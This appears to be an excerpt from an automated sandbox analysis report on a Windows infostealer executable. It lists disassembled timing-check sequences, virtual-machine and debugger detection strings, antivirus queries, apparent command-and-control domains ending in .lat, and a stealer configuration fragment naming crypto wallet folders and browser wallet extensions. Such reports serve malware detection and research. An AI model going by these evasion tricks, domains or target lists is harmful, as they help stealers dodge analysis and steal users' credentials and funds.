                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190920 second address: 519093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519093B second address: 519093F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519093F second address: 5190943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190943 second address: 5190949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190949 second address: 519094F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 519094F second address: 5190975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [770E459Ch], 05h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov cl, 63h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190975 second address: 51909BC instructions: 0x00000000 rdtsc 0x00000002 call 00007FD09CF151C9h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dx, 9904h 0x0000000e popad 0x0000000f je 00007FD10EE0321Dh 0x00000015 jmp 00007FD09CF151C3h 0x0000001a pop ebp 0x0000001b pushad 0x0000001c mov si, C41Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 movzx ecx, di 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51909EF second address: 5190A0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190A0C second address: 5190A65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD09CF151C7h 0x00000008 pop eax 0x00000009 jmp 00007FD09CF151C9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push 3993E087h 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD09CF151C9h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190A65 second address: 5190A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190A6B second address: 5190AA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 mov cx, 4B75h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3D79BBA1h 0x00000013 pushad 0x00000014 jmp 00007FD09CF151BEh 0x00000019 mov si, 7161h 0x0000001d popad 0x0000001e call 00007FD10EE0A296h 0x00000023 push 77082B70h 0x00000028 push dword ptr fs:[00000000h] 0x0000002f mov eax, dword ptr [esp+10h] 0x00000033 mov dword ptr [esp+10h], ebp 0x00000037 lea ebp, dword ptr [esp+10h] 0x0000003b sub esp, eax 0x0000003d push ebx 0x0000003e push esi 0x0000003f push edi 0x00000040 mov eax, dword ptr [770E4538h] 0x00000045 xor dword ptr [ebp-04h], eax 0x00000048 xor eax, ebp 0x0000004a push eax 0x0000004b mov dword ptr [ebp-18h], esp 0x0000004e push dword ptr [ebp-08h] 0x00000051 mov eax, dword ptr [ebp-04h] 0x00000054 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000005b mov dword ptr [ebp-08h], eax 0x0000005e lea eax, dword ptr [ebp-10h] 0x00000061 mov dword ptr fs:[00000000h], eax 0x00000067 ret 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b mov bx, 170Ch 0x0000006f pushad 0x00000070 popad 0x00000071 popad 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190AA1 second address: 5190AA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190AA7 second address: 5190AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190AAB second address: 5190B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esi, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD09CB0C7F5h 0x00000011 sub si, EC96h 0x00000016 jmp 00007FD09CB0C7F1h 0x0000001b popfd 0x0000001c push esi 0x0000001d pushfd 0x0000001e jmp 00007FD09CB0C7F7h 0x00000023 or ah, FFFFFFCEh 0x00000026 jmp 00007FD09CB0C7F9h 0x0000002b popfd 0x0000002c pop ecx 0x0000002d popad 0x0000002e mov dword ptr [ebp-1Ch], esi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov ch, 4Eh 0x00000036 movsx ebx, si 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190B90 second address: 5190B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190B94 second address: 5190B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 5190B98 second address: 5190B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0A4E second address: 51A0A88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007FD09CB0C7EAh 0x00000013 jmp 00007FD09CB0C7F5h 0x00000018 popfd 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0A88 second address: 51A0A9E instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007FD09CF151BDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0A9E second address: 51A0ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c movzx eax, bx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FD09CB0C7F7h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD09CB0C7F5h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0ADF second address: 51A0B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD09CF151BDh 0x0000000b add ecx, 6D64DA96h 0x00000011 jmp 00007FD09CF151C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007FD09CF151C6h 0x00000024 sub ax, 41E8h 0x00000029 jmp 00007FD09CF151BBh 0x0000002e popfd 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0B39 second address: 51A0B8D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD09CB0C7F8h 0x00000008 sbb ax, D448h 0x0000000d jmp 00007FD09CB0C7EBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FD09CB0C7F9h 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov bh, 47h 0x00000022 mov si, 00BBh 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0B8D second address: 51A0BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FD09CF151BEh 0x00000011 test esi, esi 0x00000013 jmp 00007FD09CF151C0h 0x00000018 je 00007FD10EDF29A8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0BD1 second address: 51A0BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0BD5 second address: 51A0BF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0BF2 second address: 51A0C5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, EC12h 0x00000007 pushfd 0x00000008 jmp 00007FD09CB0C7F3h 0x0000000d sbb ah, 0000000Eh 0x00000010 jmp 00007FD09CB0C7F9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 cmp dword ptr [770E459Ch], 05h 0x00000020 jmp 00007FD09CB0C7EEh 0x00000025 je 00007FD10EA0203Bh 0x0000002b jmp 00007FD09CB0C7F0h 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0C5F second address: 51A0C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 51A0C63 second address: 51A0C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSpecial instruction interceptor: First address: F77CA6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSpecial instruction interceptor: First address: 11AD50A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe TID: 7444Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe TID: 7380Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe TID: 2088Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe TID: 7376Thread sleep time: -34017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeLast function: Thread delayed
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872268064.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1869904751.0000000001100000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1869904751.0000000001100000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1379658924.0000000005B4F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: SICE
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1296316095.0000000005010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: observerfry.lat
                Source: Yh6fS6qfTE.exe, 00000000.00000002.1870245572.0000000001142000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1475371147.0000000005B2E000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1462741670.0000000005B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: Process Memory Space: Yh6fS6qfTE.exe PID: 7200, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1514509667.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 20},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/EleX
                Source: Yh6fS6qfTE.exe, 00000000.00000003.1514509667.0000000001438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: lmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"iWlt"},{"en":"kkpllkodjeloidieedojogacfhpaihoh","ez":"EnKrypt"},{"en":"amkmjjmmflddogmhpjloimipbofnfjih","ez":"W
